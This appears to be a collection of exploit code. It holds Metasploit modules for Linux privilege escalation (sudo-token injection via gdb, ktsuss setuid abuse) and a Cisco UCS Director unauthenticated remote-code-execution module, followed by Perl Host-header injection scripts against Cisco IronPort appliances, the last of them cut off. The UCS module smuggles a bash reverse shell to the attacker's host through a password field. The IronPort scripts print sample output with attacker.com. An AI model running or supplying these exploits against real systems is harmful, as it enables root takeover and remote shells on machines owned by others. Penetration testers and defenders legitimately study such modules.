      end
      vprint_good 'SELinux deny_ptrace is disabled'
    end

    unless command_exists? 'sudo'
      vprint_error 'sudo is not installed'
      return CheckCode::Safe
    end
    vprint_good 'sudo is installed'

    unless command_exists? 'gdb'
      vprint_error 'gdb is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gdb is installed'

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    if nosuid? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
    end

    # Find running shell processes
    shells = %w[ash ksh csh dash bash zsh tcsh fish sh]

    system_shells = read_file('/etc/shells').to_s.each_line.map {|line|
      line.strip
    }.reject {|line|
      line.starts_with?('#')
    }.each {|line|
      shells << line.split('/').last
    }
    shells = shells.uniq.reject {|shell| shell.blank?}

    print_status 'Searching for shell processes ...'
    pids = []
    if command_exists? 'pgrep'
      cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
        pids << pid.strip
      end
    else
      shells.each do |s|
        pidof(s).each {|p| pids << p.strip}
      end
    end

    if pids.empty?
      fail_with Failure::Unknown, 'Found no running shell processes'
    end

    print_status "Found #{pids.uniq.length} running shell processes"
    vprint_status pids.join(', ')

    # Upload payload
    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe

    # Blindly call system() in each shell process
    pids.each do |pid|
      print_status "Injecting into process #{pid} ..."

      cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"
      sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
      res = cmd_exec sudo_inject, nil, timeout
      vprint_line res unless res.blank?

      next unless setuid? @payload_path

      print_good "#{@payload_path} setuid root successfully"
      print_status 'Executing payload...'
      res = cmd_exec "#{@payload_path} & echo "
      vprint_line res
      return
    end

    fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
  end

  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'ktsuss suid Privilege Escalation',
'Description'    => %q{
        This module attempts to gain root privileges by exploiting
        a vulnerability in ktsuss versions 1.4 and prior.

        The ktsuss executable is setuid root and does not drop
        privileges prior to executing user specified commands,
        resulting in command execution with root privileges.

        This module has been tested successfully on:

        ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
        ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'John Lightsey', # Discovery and exploit
'bcoles'         # Metasploit
        ],
'DisclosureDate' => '2011-08-13',
'References'     =>
        [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
'Platform'       => ['linux'],
'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
'SessionTypes'   => ['shell', 'meterpreter'],
'Targets'        => [['Auto', {}]],
'DefaultOptions' =>
        {
'AppendExit'       => true,
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependSetreuid'  => true,
'PrependSetuid'    => true,
'PrependFork'      => true
        },
'DefaultTarget'  => 0))
    register_options [
      OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    unless setuid? ktsuss_path
      vprint_error "#{ktsuss_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ktsuss_path} is setuid"

    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Cisco UCS Director Unauthenticated Remote Code Execution',
'Description'    => %q{
        The Cisco UCS Director virtual appliance contains two flaws that can be combined
        and abused by an attacker to achieve remote code execution as root.
        The first one, CVE-2019-1937, is an authentication bypass, that allows the
        attacker to authenticate as an administrator.
        The second one, CVE-2019-1936, is a command injection in a password change form,
        that allows the attacker to inject commands that will execute as root.
        This module combines both vulnerabilities to achieve the unauthenticated command
        injection as root.
        It has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
'Author'         =>
        [
'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
'License'        => MSF_LICENSE,
'References'     =>
        [
          [ 'CVE', '2019-1937' ], # auth bypass
          [ 'CVE', '2019-1936' ], # command injection
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj' ],
          [ 'URL', 'FULL_DISC' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
        ],
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'DefaultOptions' =>
        {
'payload' => 'cmd/unix/reverse_bash',
        },
'Targets'        =>
        [
          [ 'Cisco UCS Director < 6.7.2.0', {} ],
        ],
'Privileged'     => true,
'DefaultTarget'  => 0,
'DisclosureDate' => 'Aug 21 2019'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true,  "Default server path", '/']),
      ])
  end

  def check
    # can't think of anything better then this
    res = send_request_cgi({
'uri'    => normalize_uri(target_uri.path, 'app', 'ui', 'login'),
'method' => 'GET'
    })
    if res and res.code == 302
        return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    # step 1: get a JSESSIONID cookie
    res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'app', 'ui', 'login'),
'method' => 'GET'
    )

    if res and (res.code == 200 or res.code == 302)
      jsession = res.get_cookies.split(';')[0]

      # step 2: authenticate our cookie as admin
      res = send_request_cgi({
'uri'       => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),
'cookie'    => jsession,
'vars_get'  =>
          {
'apiName'     => 'GetUserInfo'
          },
'headers'   =>
          {
            # X-Requested-With and Referer headers are needed, else the server ignores us
            # The X-Starship headers are the key to this auth bypass vuln, see the References
'X-Requested-With'            => 'XMLHttpRequest',
'Referer'                     => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/",
'X-Starship-UserSession-Key'  => "#{rand_text_alpha(5..12)}",
'X-Starship-Request-Key'      => "#{rand_text_alpha(5..12)}"
          },
'method' => 'GET'
      })

      if res and res.code == 200 and res.body.include?("admin")
        if not res.get_cookies.empty?
          # if the server returns a new cookie, use that
          jsession = res.get_cookies.split(';')[0]
        end
        print_good("#{peer} - Successfully bypassed auth and got our admin JSESSIONID cookie!")

        # step 3: request our reverse shell
        payload = %{{"param0":"admin","param1":{"ids":null,"targetCuicId":null,"uiMenuTag":23,"cloudName":null,"filterId":null,"id":null,"type":10},"param2":"scpUserConfig","param3":[{"fieldId":"FIELD_ID_USERNAME","value":"scpuser"},{"fieldId":"FIELD_ID_DESCRIPTION","value":"The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin."},{"fieldId":"FIELD_ID_PASSWORD","value":"`bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 &``"}]}}

        res = send_request_cgi({
'uri'       => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),
'cookie'    => jsession,
'headers'   =>
            {
              # X-Requested-With and Referer headers are needed, else the server ignores us
              # The X-Starship headers are the key to this auth bypass vuln, see the References
'X-Requested-With'            => 'XMLHttpRequest',
'Referer'                     => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/",
            },
'method' => 'POST',
'vars_post' =>
            {
'formatType'  => 'json',
'apiName'     => 'ExecuteGenericOp',
'serviceName' => 'InfraMgr',
'opName'      => 'doFormSubmit',
'opData'      => payload
            }
        })
        if res and res.code == 200
          print_good("#{peer} - Shelly is here, press ENTER to start playing with her!")
        end
      else
        fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to obtain JSESSIONID cookie")
    end
  end
end

#!/usr/bin/perl -w
#
#
#  Cisco M1070 Content Security Management Appliance IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       [test@localhost ironport]$ perl ironport_m1070.pl https://192.168.1.1 attacker.com
#  # Cisco M1070 Content Security Management Appliance IronPort Remote Header 'Host' Injection
#  # =========================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => attacker.com
#  # >  User-Agent => Mozilla/5.0 (X11; U; GNU/kFreeBSD i686; en-US; rv:1.8.1.16) Gecko/20080702 Iceape/1.1.11 (Debian-1.1.11-1)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Mon, 02 Sep 2019 07:47:04 GMT
#  # <  Pragma => no-cache
#  # <  Location => https://attacker.com/login?CSRFKey=ed92aa93-5787-9216-8f3e-2a85c6e08d8b&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Mon, 02 Sep 2019 07:47:04 GMT
#  # <  Last-Modified => Mon, 02 Sep 2019 07:47:04 GMT
#  # <  Client-Date => Mon, 02 Sep 2019 07:47:05 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://attacker.com/login?CSRFKey=ed92aa93-5787-9216-8f3e-2a85c6e08d8b&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Set-Cookie => sid=a8iViXLfkLXVv02pu9pR; expires=Wednesday, 04-Sep-2019 07:47:04 GMT; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # =========================================================================================
#  # IronPort is Poisoned => https://attacker.com/login?CSRFKey=ed92aa93-5787-9216-8f3e-2a85c6e08d8b&referrer=https%3A%2F%2Fattacker.com%2FSearch
#
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
#  
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'attacker.com';


print "# Cisco M1070 Content Security Management Appliance IronPort Remote Header 'Host' Injection
# =========================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ attacker.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# =========================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco C170 Email Security Appliance v10.0.3-003 IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       # Cisco C170 Email Security Appliance v10.0.3-003 IronPort Remote Header 'Host' Injection
#  # =======================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => attack.com
#  # >  User-Agent => Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en; rv:1.8.1.4pre) Gecko/20070511 Camino/1.6pre
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Mon, 02 Sep 2019 10:42:35 GMT
#  # <  Location => https://attack.com/login?CSRFKey=0c52025e-c65f-e8d5-3ae6-e07fec6a102c&referrer=https%3A%2F%2Fattack.com%2Fdefault
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Mon, 02 Sep 2019 10:42:35 GMT
#  # <  Last-Modified => Mon, 02 Sep 2019 10:42:35 GMT
#  # <  Client-Date => Mon, 02 Sep 2019 10:42:35 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer =>
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://attack.com/login?CSRFKey=0c52025e-c65f-e8d5-3ae6-e07fec6a102c&referrer=https%3A%2F%2Fattack.com%2Fdefault
#  # <  Set-Cookie => sid=1g2L5mSPA8l0NhiKdpJw; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # =======================================================================================
#  # IronPort is Poisoned => https://attack.com/login?CSRFKey=0c52025e-c65f-e8d5-3ae6-e07fec6a102c&referrer=https%3A%2F%2Fattack.com%2Fdefault
#
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
#
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'attacker.com';


print "# Cisco C170 Email Security Appliance v10.0.3-003 IronPort Remote Header 'Host' Injection
# =======================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ attacker.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# =======================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco Email Security Virtual Appliance C100V IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       [test@localhost ironport]$ perl ironport_c100v.pl https://192.168.1.1 attacker.com
#  # Cisco Email Security Virtual Appliance C100V IronPort Remote Header 'Host' Injection
#  # ====================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => attacker.com
#  # >  User-Agent => Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Mon, 02 Sep 2019 13:50:10 GMT
#  # <  Location => https://attacker.com/login?CSRFKey=6c74441b-fe79-9d05-3273-bf06907363d6&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Mon, 02 Sep 2019 13:50:10 GMT
#  # <  Last-Modified => Mon, 02 Sep 2019 13:50:10 GMT
#  # <  Client-Date => Mon, 02 Sep 2019 13:50:09 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer =>
#  # <  Client-SSL-Cert-Subject =>
#  # <  Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Content-Security-Policy => "default-src 'self' ; img-src 'self''data' ; connect-src 'self''wss' ; report-uri https://CENSORED/report/URL;"
#  # <  Public-Key-Pins => pin-sha256="1mrdZnNreHkkEsgQgh1qML/lXsZO46ylRtom1E/KQRU="; pin-sha256="lub4Z419z4mXVxmkkLqAosIc1V7nWCz8vp2i+zuaGqs="; max-age=2592000; includeSubDomains
